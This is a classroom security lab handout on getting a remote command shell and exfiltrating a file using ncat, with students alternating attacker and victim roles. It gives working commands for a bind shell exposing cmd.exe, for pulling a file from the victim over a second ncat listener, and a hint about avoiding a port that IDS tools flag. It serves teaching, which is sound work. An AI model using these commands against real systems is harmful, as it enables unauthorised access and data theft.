Shell lab SP17 DBGrevised (1)

  1. Getting a command (CMD) shell

Objective: Understand how APT allows access into a corporate network.

Discussion: It is important to understand how attackers are able to obtain a shell on a remote system since it is common method of maintaining access and stealing data (exfiltration or exfil). netcat is a simple but powerful program for establishing connections. netcat derives it’s name from the linux command for typing the contents of files: cat (short for concatenate – join)

Scenario: Two systems that can directly communicate to each other on an arbitrary port (ie. there's no firewall or other device preventing them from communicating directly to each other.) Alice is the victim and Eve is the attacker so one of you will be Alice for the duration of the assignment and other one Eve. When the first person is done, switch roles.

Preparation:

  1. Ensure the two Windows workstations can ping each other.

  2. Make a note of each other’s IP address.

    1. 192.168.3.27

  3. Download and install nmap from nmap.org

  4. Start a command prompt (cmd.exe)

  5. Change directory to the nmap install dir (cd “C:\Program Files (x86)\Nmap”)

  6. Each system (i.e. both alice and eve) type hostname into the command prompt so you know the hostname of each.

On Alice’s computer, a listener (-l) (lower case L) is started on port 8001 and anyone that connects to it will get a command prompt on Alice's computer. The -v is for verbose mode. It is always a good option so you know what is going on as the shell is being setup.

Alice (on Windows): ncat -l 8001 -e cmd.exe -v

Eve Connects to Alice's computer on port 8001.

ncat X.X.X.X 8001 Replace X.X.X.X with the IP address of Alice’s computer.

Eve should now see something like this:

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Alice

Eve is now logged into Alice's system and can type commands as if he was sitting in front of her computer.

Run the command: hostname

you should see the computer name of the windows system. Additionally, the command:

ipconfig /all which should display the IP address of the windows system of your Partner.

Submission: Take a screenshot of the results above for both commands and switch roles.

  1. Optional DATA EXFILTRATION

Objective: Understand how Advanced Persistent Threat (APT) exfiltrates (retrieve) data from an organizations.

Scenario: Assuming two systems can directly communicate to each other on an arbitrary port (ie. there's no firewall or other device preventing them from communicating directly to each other.) Alice is the victim and Eve is the attacker.

Attackers often browse around the computer system and compress and transfer files to a remote system. This demonstrates that capability using NCAT.

Preparation: Re-establish a shell on your partner’s system (from the previous lab).

Alice: Download the “expense-report.xls” file from Canvas and save it to the Downloads folder, which it should by default.

Eve, should have an ncat session open on Alice’s host (from the previous lab). Using access to Alice’s cmd, Eve is going to open another connection from Alice’s computer on port 4000

Eve (run this command on Alice’s computer):

ncat -vv -l 4000 --send-only < %USERPROFILE%\Downloads\expense-report.xls

The < is a redirect indicating that when someone connects they will be sent the file

%USERPROFILE% substitutes the user home directory path

Eve: Open a new command prompt on your workstation and run the commands:

Browse to your Downloads directory

Type dir to see the contents

In the “dir” command above, look for the expense-report.xls file before running the command below. It should not be there:

Eve: ncat -vv host1 4000 > expense-report.xls (Replace “host1” with the IP address of Alice’s workstation.). This will connect to the new server at port 4000 and redirect the file to Eve’s computer.

Eve: Browse to your Downloads folder and see if you see the “expense-report.xls” file AND can open it.

Using the backdoor connection to Alice, Eve was able to open up a connection she could use to transfer files out of Alice’s computer.

Submission: Take a screenshot of the output from the ncat commands to upload to Canvas.

INFORMATIONAL ONLY: Always specify a port number. Otherwise, ncat will default to using port 31337. That is a well-known Trojan port and could trigger an alert which an Intrusion Detection System or firewall may alert on. The type of attackers that ‘persist’ in networks, would hide their existence.

PreviousSteganography sec250 FA 2022 (1)NextNotes

Last updated